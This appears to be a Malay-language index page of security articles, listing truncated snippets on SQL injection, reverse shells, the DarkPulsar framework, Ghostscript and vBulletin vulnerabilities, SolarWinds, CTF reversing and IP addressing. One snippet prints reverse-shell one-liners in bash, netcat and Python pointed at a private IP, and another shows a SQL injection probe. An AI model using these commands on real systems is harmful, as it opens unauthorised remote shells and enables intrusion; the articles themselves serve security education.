lokasi sekarang:Rumah > Artikel teknikal > Operasi dan penyelenggaraan > Keselamatan
- Arah:
- semua web3.0 pembangunan bahagian belakang hujung hadapan web pangkalan data Operasi dan penyelenggaraan alat pembangunan rangka kerja php masalah biasa lain teknologi Tutorial CMS Java Tutorial sistem tutorial komputer Tutorial Perkakasan Tutorial mudah alih Tutorial perisian Tutorial permainan mudah alih
- Mengelaskan:
-
- Apakah jenis suntikan SQL?
- Kaedah serangan suntikan SQL Prakata boleh dibahagikan kepada suntikan eksplisit, suntikan ralat dan suntikan buta mengikut aplikasi memproses kandungan yang dikembalikan oleh pangkalan data. Penyerang suntikan eksplisit boleh terus mendapatkan kandungan yang mereka inginkan daripada kandungan antara muka semasa. Hasil yang dikembalikan oleh pertanyaan pangkalan data suntikan ralat tidak dipaparkan pada halaman, tetapi aplikasi mencetak maklumat ralat pangkalan data ke halaman, jadi penyerang boleh membina pernyataan ralat pangkalan data dan mendapatkan kandungan yang dikehendaki daripada maklumat ralat. Hasil pertanyaan pangkalan data suntikan buta tidak boleh diperoleh daripada halaman intuitif Penyerang memperoleh kandungan yang dikehendaki dengan menggunakan logik pangkalan data atau melambatkan pelaksanaan perpustakaan pangkalan data. Suntikan gabungan manual mysql suntikan?id=1'orderby4--
- Keselamatan 2367 2023-05-18 22:05:12
-
- Apakah peluru lantunan semula?
- 1.bash反弹bash-i>&/dev/tcp/ip_address/port0>&12.nc反弹nc-e/bin/sh192.168.2.13044443.pythonimportsocket,subprocess,oss=socket.socket(socket.AF_INET SOCK_STREAM)s.connect(("192.168.2.130",4444))os.dup2(s.fileno(),0)os.dup2(s.
- Keselamatan 2464 2023-05-18 22:01:04
-
- Cara menggunakan rangka kerja APT baharu NSA DarkPulsar
- Prakata Pada Mac 2017, ShadowBrokers mengeluarkan dokumen sulit yang mengejutkan dunia, termasuk dua rangka kerja: DanderSpritz dan FuzzBunch. DanderSpritz terdiri sepenuhnya daripada pemalam dan digunakan untuk mengumpulkan kecerdasan, mengeksploitasi kelemahan dan memanipulasi peranti yang diambil alih. Ia ditulis dalam Java dan menyediakan antara muka grafik yang serupa dengan panel pengurusan botnet dan panel kawalan yang serupa dengan alat Metasploit. Ia juga menggabungkan pintu belakang dan pemalam untuk peranti yang tidak dikawal oleh FuzzBunch. Gambaran Keseluruhan Antara Muka DanderSprit Fuzzbunch menyediakan rangka kerja untuk utiliti yang berbeza untuk berinteraksi dan bekerja bersama, termasuk pelbagai jenis pemalam.
- Keselamatan 1504 2023-05-18 20:14:58
-
- Cara menganalisis kerentanan pintasan kotak pasir Ghostscript SAFER
- Prakata Ghostscript ialah perisian penterjemah untuk bahasa Adobe PostScript. Ia boleh menarik dalam bahasa PostScript dan menyokong penukaran antara PS dan PDF. Pada masa ini, ia dipasang secara lalai dalam kebanyakan pengedaran Linux dan telah dialihkan ke Unix, MacOS, Windows dan platform lain Ghostscript juga digunakan oleh program seperti ImagineMagic, PythonPIL dan pelbagai pembaca PDF. Perihalan kerentanan Pada 21 Ogos, penyelidik keselamatan Google Tavis Ormandy mendedahkan pelbagai kelemahan GhostScript Dengan membina skrip PostScript yang berniat jahat dalam imej, anda boleh memintas
- Keselamatan 1993 2023-05-18 19:10:39
-
- DDCTF2019两个逆向分别是什么
- 01Confused首先参考链接https://www.52pojie.cn/forum.php?mod=viewthread&tid=860237&page=1首先分析到这个sub_1000011D0是关键函数是没有什么问题的,直接shift+f12定位DDCTF的字符串就到了这一部分逻辑if((unsignedint)sub_1000011D0(*((__int64*)&v14+1))==1)objc_msgSend(v17,"onSuccess"
- Keselamatan 1596 2023-05-18 17:13:20
-
- Analisis contoh memintas akses terhad kepada sistem pengurusan dalaman Google
- Pada suatu hari, semasa mencari kelemahan Google, saya menemui beberapa alamat IP perkhidmatan Google sendiri daripada kelemahan awam Pada mulanya, saya benar-benar tidak tahu apa yang boleh dilakukan oleh alamat IP ini. Saya menyemak alamat IP ini terlebih dahulu dan seterusnya mendapati bahawa ia mengandungi beberapa IP dalaman Google. Saya tiba-tiba teringat bahawa baru-baru ini, rakan saya KLSREERAM melaporkan kelemahan yang berkaitan dengan IP dalaman Google, dan rakan lain Vishnu melaporkan kelemahan yang menggunakan subdomain Google untuk mengakses panel kawalan. Pada masa ini, kedua-dua kelemahan telah diperbaiki oleh Google, dan alamat IP dalaman yang berkaitan dengan kedua-dua kelemahan ini tidak boleh diakses daripada Internet. Tetapi sekarang, dengan beberapa alamat IP dalaman Google di hadapan saya, saya perlu mencari jalan untuk melihat sama ada saya boleh
- Keselamatan 1222 2023-05-18 15:19:49
-
- Bagaimana untuk melaksanakan analisis kelemahan aplikasi Disk Pulse Enterprise Window
- 1. Pengenalan Kerentanan DiskPulseEnterprise ialah perisian yang memantau perubahan cakera Ia boleh menyambung dan mengurus perisian melalui port pengurusan 9120 atau tetingkap pengurusan web 80 untuk memantau perubahan cakera. Terdapat perpustakaan pautan dinamik libspp.dll dalam DiskPulse Enterprise, yang mengandungi beberapa fungsi yang bertanggungjawab untuk operasi HTTP Masalah berlaku dalam perpustakaan pautan dinamik ini Apabila memproses data pasca, tiada kawalan panjang yang ketat pada data pasca. mengakibatkan Apabila melaksanakan data yang diperoleh, ia menyalin data ke memori tidak sah, menyebabkan limpahan penimbal, mencetuskan pemprosesan tingkah laku abnormal SEH, dan akhirnya mengawal EIP untuk melaksanakan kod sewenang-wenangnya. Pautan muat turun perisian: h
- Keselamatan 1234 2023-05-18 15:04:07
-
- Apakah sebab utama ranap sistem APP?
- 1. Apakah jenis senario yang mungkin menyebabkan masalah ranap? Baru-baru ini, saya telah memikirkan jenis masalah yang mungkin menyebabkan ranap - iaitu, mempunyai pemikiran yang tidak normal Contohnya: Saya menonton siri TV Amerika yang dipanggil "The Rookie " baru dua hari lepas. "Polis", ada adegan di mana protagonis John Nolan gagal memberhentikan kereta pelarian itu dengan kereta polis, menyebabkan pelarian itu melarikan diri. Apakah kaitan antara adegan ini dengan ujian itu? Pertama sekali, orang biasa akan mengelakkan perlanggaran dengan orang lain ketika memandu di jalan raya Ini seperti proses utama menguji fungsi, dan mereka tidak akan membuat input secara rawak tetapi dia akan melakukan apa sahaja untuk menangkap pelarian. Semua kaedah, ini adalah seperti pemikiran yang tidak normal semasa proses ujian, memikirkan bagaimana untuk mengendalikan fungsi untuk menjadikannya sukar untuk digunakan. Panduan 1. Operasi tidak normal Pelbagai operasi tidak normal
- Keselamatan 2595 2023-05-18 13:55:06
-
- Apakah teknik biasa untuk pangkalan data MySQL?
- 1. Bagaimana untuk memilih jenis pelayan? Maksud setiap parameter dalam tetingkap konfigurasi pelayan MySQL adalah seperti berikut. [ServerConfigurationType] Pilihan ini digunakan untuk menetapkan jenis pelayan. Klik butang bawah di sebelah kanan pilihan ini untuk melihat 3 pilihan. Makna khusus bagi tiga pilihan adalah seperti berikut: Mesin Pembangunan: Pilihan ini mewakili stesen kerja desktop peribadi biasa. Andaikan terdapat berbilang aplikasi desktop yang berjalan pada mesin. Konfigurasikan pelayan MySQL untuk menggunakan sumber sistem yang minimum. ServerMachine (pelayan): Pilihan ini mewakili pelayan MySQL boleh dijalankan bersama-sama dengan aplikasi lain, seperti FTP, EMA
- Keselamatan 1111 2023-05-18 13:29:00
-
- Contoh Analisis Risiko Keselamatan Insiden Serangan APT Rantaian Bekalan SolarWinds
- Latar Belakang Pada 13 Disember, syarikat keselamatan terkemuka A.S. FireEye (nama Cina: Huoyan) mengeluarkan laporan yang menyatakan bahawa ia telah menemui aktiviti pencerobohan global dan menamakan organisasi itu UNC2452. Organisasi APT menceroboh syarikat SolarWinds, menanam kod hasad dalam pakej kemas kini perisian komersial SolarWindsOrion dan mengedarkannya FireEye memanggilnya sebagai perisian hasad SUNBURST. Pintu belakang mengandungi keupayaan untuk memindahkan fail, melaksanakan fail, menganalisis sistem, but semula mesin dan melumpuhkan perkhidmatan sistem untuk tujuan pergerakan sisi dan kecurian data. SolarWindsOrionPlatform ialah platform pemantauan dan pengurusan infrastruktur yang berkuasa dan boleh skala untuk
- Keselamatan 1250 2023-05-18 12:52:27
-
- Contoh analisis kelemahan pelaksanaan kod jauh vBulletin 5.x
- Pengenalan kepada komponen vBulletin vBulletin ialah peneraju global dalam perisian penerbitan forum dan komuniti. Keselamatannya, fungsi pengurusan yang berkuasa dan kepantasannya serta keupayaannya untuk berkhidmat kepada lebih 40,000 komuniti dalam talian amat digemari oleh pelanggan. Banyak forum besar telah memilih vBulletin sebagai komuniti mereka. Daripada senarai pelanggan yang dipaparkan di laman web rasmi vBulletin, kita dapat mengetahui bahawa syarikat pengeluaran permainan terkenal EA, platform permainan terkenal Steam, syarikat multinasional Jepun yang besar, Sony, dan Amerika Syarikat, vBulletin semuanya adalah pelanggannya yang cekap, stabil dan selamat. Di China Terdapat juga ramai pelanggan besar, seperti Hummingbird.com, 51 Group Buying, Ocean Tribe dan forum dalam talian lain dengan berpuluh ribu orang menggunakan vBull.
- Keselamatan 1467 2023-05-18 11:46:45
-
- Analisis contoh Google membetulkan kerentanan Chrome 0 hari di bawah serangan aktif
- Google mengeluarkan kemas kini Chrome pada 25hb untuk membetulkan tiga kelemahan keselamatan, termasuk kerentanan 0 hari yang sedang dieksploitasi secara aktif. Butiran tentang serangan ini dan cara kerentanan dieksploitasi terhadap pengguna Chrome belum didedahkan kepada umum. Serangan itu ditemui pada 18 Februari oleh Clement Lecigne, ahli pasukan analisis ancaman Google. Kumpulan Analisis Ancaman Google ialah jabatan di Google yang menyiasat dan menjejaki kumpulan pelakon ancaman. Chrome versi 80.0.3987.122 membetulkan kerentanan 0 hari. Kemas kini tersedia untuk pengguna Windows, Mac dan Linux, tetapi pengguna ChromeOS, iOS dan Android
- Keselamatan 996 2023-05-18 11:25:12
-
- Apakah mekanisme kebenaran API yang mudah dan selamat berdasarkan algoritma tandatangan?
- Semasa saya mengusahakan sistem pengiklanan, saya mendapati bahawa sistem pengiklanan kebanyakan platform yang saya sambungkan menggunakan token untuk membenarkan antara muka, dan token ini kekal tidak berubah dan disediakan oleh pengiklan. Ia boleh dikatakan bahawa ini adalah antara muka yang meleret , tetapi jenis ini Antara muka tidak mempunyai keperluan keselamatan yang tinggi, yang hanya boleh menghalang panggilan berniat jahat dan mengesahkan identiti saluran. Tahun lepas, pengarang menulis tentang platform kebenaran bersatu API yang menyediakan pengurusan kebenaran bersatu untuk antara muka terbuka perkhidmatan dalaman dan panggilan sistem pihak ketiga Selain daripada memudahkan kebenaran antara muka pengurusan, ia tidak mempunyai tujuan lain, tetapi ia memerlukan wang untuk digunakan. Ini mungkin projek paling sia-sia yang pernah saya lakukan. Mekanisme kebenaran API yang diperkenalkan hari ini juga mungkin merupakan mekanisme kebenaran antara muka API yang digunakan secara meluas Saya masih ingat bahawa pengarang pernah melakukan fungsi pembayaran WeChat.
- Keselamatan 1591 2023-05-18 10:49:52
-
- Cara idaPro menganalisis skrip lua penyahsulitan aplikasi
- Melalui penyahpepijatan atau cangkuk idaPro sebelumnya, kita boleh mendapatkan kunci penyahsulitan xxtea Untuk tanda, kita boleh terus membuka fail asal: kita boleh melihat nilai tanda: byds. Oleh itu, kita boleh cuba menyahsulitnya dengan alat penyahsulitan xxtea (yang boleh disusun daripada kod sumber pada GitHub): Mengambil index.luac sebagai contoh, kita melihat perubahan sebelum dan selepas penyahsulitan index.luac: Kami melihat bahawa skrip lua selepas penyahsulitan oleh xxtea masih bukan teks biasa! Kami sebelum ini menentukan bahawa penyulitan xxtea digunakan berdasarkan kod sumber rangka kerja cocos2d dan hasil penyahkodan apk induk, dan skrip Lua apl itu juga mempunyai nilai tandatangan, yang turut mengesahkan bahawa ia adalah kaedah penyulitan xxtea, tetapi kami
- Keselamatan 1950 2023-05-18 08:34:19
-
- Bagaimana untuk melaksanakan analisis dan aplikasi alamat IP
- 1. Alamat IP 1. IPV4 terdiri daripada nombor binari 32-bit 2. Alamat IP terdiri daripada dua bahagian: bit rangkaian + bit hos 3. Klasifikasi alamat IP: Bit rangkaian julat kategori dan bit hos A1-126 rangkaian + utama + utama + Utama B128-191 Rangkaian + Rangkaian + Utama + Utama C192-223 Rangkaian + Rangkaian + Rangkaian + Utama D224-239 Alamat Multicast E240-254 Penyelidikan Saintifik 2. Alamat Rangkaian Persendirian A10.0.0.0~10.255.255.255B172,16.0 .0~172.31.255.255C192.168.0.0~192.168.255.255 3. Subnet mask Subnet mask digunakan untuk membezakan bit rangkaian dan bit hos bagi alamat IP Bit rangkaian diwakili oleh 1 berturut-turut.
- Keselamatan 2166 2023-05-17 22:55:04